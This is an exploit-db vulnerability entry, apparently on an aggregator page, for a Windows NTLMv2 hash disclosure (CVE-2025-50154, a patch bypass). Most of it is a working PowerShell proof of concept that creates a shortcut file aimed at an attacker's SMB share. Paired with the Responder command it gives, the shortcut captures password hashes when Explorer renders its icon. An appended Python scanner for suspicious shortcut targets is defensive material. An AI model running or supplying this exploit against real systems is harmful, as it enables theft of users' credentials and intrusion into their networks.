Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure

18 Aug 2025 00:00:00 | Reported by Ruben Enkaoua | Type: exploitdb | Source: www.exploit-db.com

Windows 10.0.19045 NTLMv2 hash disclosure via LNK to SMB; CVE-2025-50154 patch bypass.

Code
# Exploit Title: Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure
# Date: 13/08/2025
# Exploit Author: Ruben Enkaoua
# Author link: https://x.com/RubenLabs, https://github.com/rubenformation
# Original Blog: https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/
# Vendor Homepage: https://microsoft.com
# Software Link: https://www.microsoft.com/en-us/software-download
# Version: All versions prior to Patch Tuesday August 2025
# Tested on: Windows 10.0.19045
# CVE : CVE-2025-50154
# This exploit is for the CVE-2025-24054 patch bypass


# Start a responder with:
# responder -I <interface> -v

<#
.SYNOPSIS
    Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure.
    This code is for educational and research purposes only.
    The author takes no responsibility for any misuse of this code.
.DESCRIPTION
    This script generates a .LNK shortcut pointing to a remote SMB-hosted binary file.
    The shortcut uses a default Windows icon (SHELL32.dll) but still forces Explorer to
    fetch the PE icon from the remote binary, triggering authentication.
.PARAMETER path
    Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop).
.PARAMETER ip
    IP address or hostname of the remote SMB server hosting the binary.
.PARAMETER share
    The shared folder on the SMB server where the binary is stored.
.PARAMETER file
    The name of the binary file (e.g., payload.exe).
.EXAMPLE
    .\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware" -file "payload.exe"
#>

param(
    [Parameter(Mandatory=$true)]
    [string]$path,    # -path
    [Parameter(Mandatory=$true)]
    [string]$ip,      # -ip
    [Parameter(Mandatory=$true)]
    [string]$share,   # -share
    [Parameter(Mandatory=$true)]
    [string]$file     # -file
)

# Build file paths
$shortcutPath = Join-Path $path "poc.lnk"
$targetPath = "\\$ip\$share\$file"
$iconLocation = "C:\Windows\System32\SHELL32.dll"

# Create LNK file
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()

Write-Output "Shortcut created at: $shortcutPath"
Write-Output "Target path: $targetPath"
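
A defensive triage example for the technique above, added here and not part of the original exploit-db entry: it reads `.lnk` files as raw bytes, so the shell never parses them, and reports shortcuts whose embedded UNC target points at a host outside an allowlist. `TRUSTED_HOSTS`, the function names and the `make_sample` blobs are constructed assumptions.

```python
import re
import struct
import sys
from pathlib import Path

# MS-SHLLINK header: HeaderSize 0x0000004C followed by the fixed LinkCLSID.
LNK_MAGIC = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000c000000000000046")
# \\host\share prefix of a UNC path.
UNC = re.compile(r"\\\\([A-Za-z0-9._-]{1,253})\\([A-Za-z0-9._$ -]{1,80})")

# Assumption: hosts your environment legitimately points shortcuts at.
TRUSTED_HOSTS = {"fileserver01"}


def unc_targets(data: bytes) -> set:
    """Return (host, share) pairs for UNC paths stored anywhere in a .lnk blob."""
    if not data.startswith(LNK_MAGIC):
        return set()  # not a Shell Link file
    # Paths may be stored as single-byte or UTF-16LE strings, so search one
    # single-byte view and both UTF-16 alignments.
    views = [data.decode("latin-1")]
    views += [data[off:].decode("utf-16-le", errors="ignore") for off in (0, 1)]
    return {(m.group(1).lower(), m.group(2)) for v in views for m in UNC.finditer(v)}


def untrusted_targets(data: bytes, trusted=TRUSTED_HOSTS) -> list:
    """UNC targets whose host is not on the allowlist, sorted for stable output."""
    return sorted(t for t in unc_targets(data) if t[0] not in trusted)


def scan(root: str, trusted=TRUSTED_HOSTS) -> dict:
    """Walk a directory tree and map each flagged .lnk path to its UNC targets."""
    findings = {}
    for lnk in Path(root).rglob("*.lnk"):
        try:
            hits = untrusted_targets(lnk.read_bytes(), trusted)
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if hits:
            findings[str(lnk)] = hits
    return findings


def make_sample(unc: str, wide: bool) -> bytes:
    """Constructed test blob: LNK header magic, zero padding, then the path."""
    body = unc.encode("utf-16-le" if wide else "ascii")
    return LNK_MAGIC.ljust(76, b"\x00") + body + b"\x00\x00"


if __name__ == "__main__":
    for path, hits in scan(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, hits)
```

Run it against download, mail-attachment and extracted-archive directories; any hit on a host outside the allowlist is worth checking against outbound SMB (TCP 445) logs for the same host.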

Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 5.4 - 6.5
EPSS: 0.24268